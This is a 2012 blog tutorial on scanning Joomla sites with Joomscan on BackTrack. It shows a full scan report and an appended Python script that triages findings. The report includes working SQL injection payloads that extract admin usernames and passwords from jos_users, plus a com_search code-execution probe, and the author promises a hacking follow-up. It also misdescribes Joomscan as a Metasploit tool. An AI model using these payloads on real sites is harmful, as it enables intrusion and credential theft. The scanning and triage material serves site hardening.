Friday, November 23, 2012

Finding Joomla Weaknesses with Joomscan

Well, after a long break from this blog because of all the college assignments, it's time to post at least one update. There are still plenty of assignments I haven't finished... hehehe

In this post I'll talk a bit about the metasploit tools that come with BackTrack. Here I'm using BT5R2 (Backtrack 5 Release 2). The tool I'm using is Joomscan. As the title says, the goal is to find out the weaknesses of a Joomla website using Joomscan.

Before getting to the main topic, it's good to know what Joomscan is. In my view, Joomscan is one of the metasploit tools used to check or scan for weaknesses/bugs/vulnerabilities of a website built on the Joomla CMS (Component Management System). That's my brief understanding of Joomscan. For more details, please look up other references about Joomscan. CMIIW



OK, on to the main topic: how to check the weaknesses of the Joomla website you've built. The first step is to go to the menu:

Backtrack --> Vulnerability Assessment --> Web Application Assessment --> CMS Vulnerability Identification --> Joomscan

After that, a terminal will appear with output like the following:


 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|.
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   ||
||      ||   ||  ||  |     |  ||     ''|||.   ||...|'
'|.     ||    ||| |||     .''''|.  .     '||  ||    
 ''|...|'      |   |     .|.  .||. |'....|'  .||.   
  

=================================================================
 OWASP Joomla! Vulnerability Scanner v0.0.4
 (c) Aung Khant, aungkhant]at[yehg.net
 YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
 Update by: Web-Center, http://web-center.si (2011)
=================================================================

 Vulnerability Entries: 611
 Last update: February 2, 2012

 Usage:  ./joomscan.pl -u <string> -x proxy:port
         -u <string>      = joomla Url

         ==Optional==

         -x <string:int>  = proXy to tunnel
         -c <string>      = Cookie (name=value;)
         -g "<string>"    = desired useraGent string(within ")
         -nv              = No Version fingerprinting check
         -nf              = No Firewall detection check
         -nvf/-nfv        = No version+firewall check
         -pe              = Poke version only and Exit
         -ot              = Output to Text file (target-joexploit.txt)
         -oh              = Output to Html file (target-joexploit.htm)
         -vu              = Verbose (output every Url scan)
         -sp              = Show completed Percentage
       
 ~Press ENTER key to continue


 Example:  ./joomscan.pl -u victim.com -x localhost:8080
    
 Check:    ./joomscan.pl check
           - Check if the scanner update is available or not.

 Update:   ./joomscan.pl update
           - Check and update the local database if newer version is available.

 Download: ./joomscan.pl download
           - Download the scanner latest version as a single zip file - joomscan-latest.zip.

 Defense:  ./joomscan.pl defense
           - Give a defensive note.

 About:    ./joomscan.pl story
           - A short story about joomscan.

 Read:     ./joomscan.pl read DOCFILE
           DOCFILE - changelog,release_note,readme,credits,faq,owasp_project
  
Now just type in the website whose weaknesses you want to check, like this:
./joomscan.pl -u yoursite.com

After that, wait a few minutes and the scan results will appear like the following:
 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|. 
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   ||
||      ||   ||  ||  |     |  ||     ''|||.   ||...|'
'|.     ||    ||| |||     .''''|.  .     '||  ||     
 ''|...|'      |   |     .|.  .||. |'....|'  .||.    
   

=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4 
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================


Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan


Server: rh
X-Powered-By: PHP/5.2.17


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

~Unable to detect the version. Is it sure a Joomla?

## Fingerprinting done.




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? Yes

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application.  Affected administrator components include com_admin, com_media, com_search.  Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities. 
Vulnerable? N/A

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie.  This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? N/A

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped.  Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? N/A

# 6
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? N/A

# 7
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? N/A

# 8
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? N/A

# 9
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? N/A

# 10
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? N/A

# 11
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? N/A

# 12
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 13
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 14
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 15
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 16
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? N/A

# 17
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? N/A

# 18
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? N/A

# 19
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archive
Vulnerable? No

# 20
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? N/A

# 21
Info -> CoreComponent: com_users XSS Vulnerability
Version Affected: Joomla! 1.5.10 <=
Check: /components/com_users/
Exploit: A XSS vulnerability exists in the user view of com_users in the administrator panel.
Vulnerable? N/A

If Vulnerable says Yes, then there is an open hole there... hehehehe at least that's what I've learned about Joomscan so far. Next time we'll continue with how to hack it... hehehehe
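Reading a long Joomscan listing by hand is tedious, and the "Vulnerable?" column is what a site owner actually needs from it. The following is an added example (my own code, not part of this post or of the Joomscan project): it parses the plain-text listing format shown above into structured findings, separates the confirmed "Yes" entries from the "N/A" ones (the scan above could not fingerprint the Joomla version, so every version-based check came back N/A and needs manual review), and attaches a remediation note to the two generic checks. The SAMPLE_REPORT is a constructed, trimmed copy of the report format; the REMEDIATION wording is my own, based on standard Joomla hardening (rename htaccess.txt to .htaccess, restrict the administrator directory).

```python
"""Parse a Joomscan text report into findings and triage them.

Added example; not part of the original post or of Joomscan itself.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in Joomscan's "Vulnerabilities Discovered" listing
# format (same field names as v0.0.4 prints; one exploit string omitted).
SAMPLE_REPORT = """\
Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts.
Vulnerable? Yes

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application.
Vulnerable? N/A

# 12
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: (payload omitted)
Vulnerable? No
"""


@dataclass
class Finding:
    number: int
    category: str      # Generic, Core, CoreComponent, ...
    title: str
    versions: str      # text after "Versions Affected:" / "Versions effected:"
    check: str         # path Joomscan requested for this check
    vulnerable: str    # "Yes", "No" or "N/A", exactly as Joomscan prints it


_ENTRY_RE = re.compile(r"^#\s*(\d+)$")
# Joomscan spells this field three ways: Versions Affected / Version Affected / Versions effected.
_VERSIONS_RE = re.compile(r"^Versions?\s+(Affected|effected):", re.IGNORECASE)


def parse_report(text: str) -> List[Finding]:
    """Walk the report line by line; each "# N" header starts a new entry."""
    findings: List[Finding] = []
    current: Optional[Dict[str, object]] = None

    def flush() -> None:
        if current is not None:
            findings.append(Finding(
                number=int(current["number"]),
                category=str(current.get("category", "")),
                title=str(current.get("title", "")),
                versions=str(current.get("versions", "")),
                check=str(current.get("check", "")),
                vulnerable=str(current.get("vulnerable", "N/A")),
            ))

    for raw in text.splitlines():
        line = raw.strip()
        header = _ENTRY_RE.match(line)
        if header:
            flush()
            current = {"number": int(header.group(1))}
            continue
        if current is None:
            continue                      # banner text before the first entry
        if line.startswith("Info ->"):
            category, _, title = line[len("Info ->"):].partition(":")
            current["category"] = category.strip()
            current["title"] = title.strip()
        elif _VERSIONS_RE.match(line):
            current["versions"] = line.split(":", 1)[1].strip()
        elif line.startswith("Check:"):
            current["check"] = line.split(":", 1)[1].strip()
        elif line.startswith("Vulnerable?"):
            current["vulnerable"] = line.split("?", 1)[1].strip()
        # "Exploit:" lines are deliberately not stored; triage only needs
        # what was checked and whether the scanner confirmed it.
    flush()
    return findings


def triage(findings: List[Finding]) -> Tuple[List[Finding], List[Finding]]:
    """"Yes" needs action now; "N/A" means Joomscan could not decide and
    needs manual review; "No" entries are dropped from both lists."""
    confirmed = [f for f in findings if f.vulnerable == "Yes"]
    undecided = [f for f in findings if f.vulnerable == "N/A"]
    return confirmed, undecided


# Assumed remediation wording for the two generic checks (standard Joomla hardening).
REMEDIATION = {
    "/htaccess.txt": "Rename htaccess.txt to .htaccess so the shipped rules are actually applied.",
    "/administrator/": "Restrict /administrator/ (IP allowlist or an extra authentication layer) and enforce strong admin passwords.",
}


def remediation_for(finding: Finding) -> str:
    return REMEDIATION.get(finding.check, "Review the affected component and update Joomla to a fixed release.")


if __name__ == "__main__":
    found = parse_report(SAMPLE_REPORT)
    confirmed, undecided = triage(found)
    for f in confirmed:
        print(f"#{f.number} {f.title} -> {remediation_for(f)}")
    print(f"{len(undecided)} finding(s) need manual review (version not fingerprinted)")
```

Feed it the text saved with `-ot` (target-joexploit.txt) instead of SAMPLE_REPORT to triage a real run; the "Exploit:" payload lines are intentionally ignored, since fixing the two confirmed generic findings does not require them.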


*This tutorial is for personal purposes only. If it is misused by readers, the author is not responsible.

CMIIW



ino_ot

2 comments:

  1. Awesome, bro. (y)
    nice post. I want to learn, bro.
    teach me please, bro :)
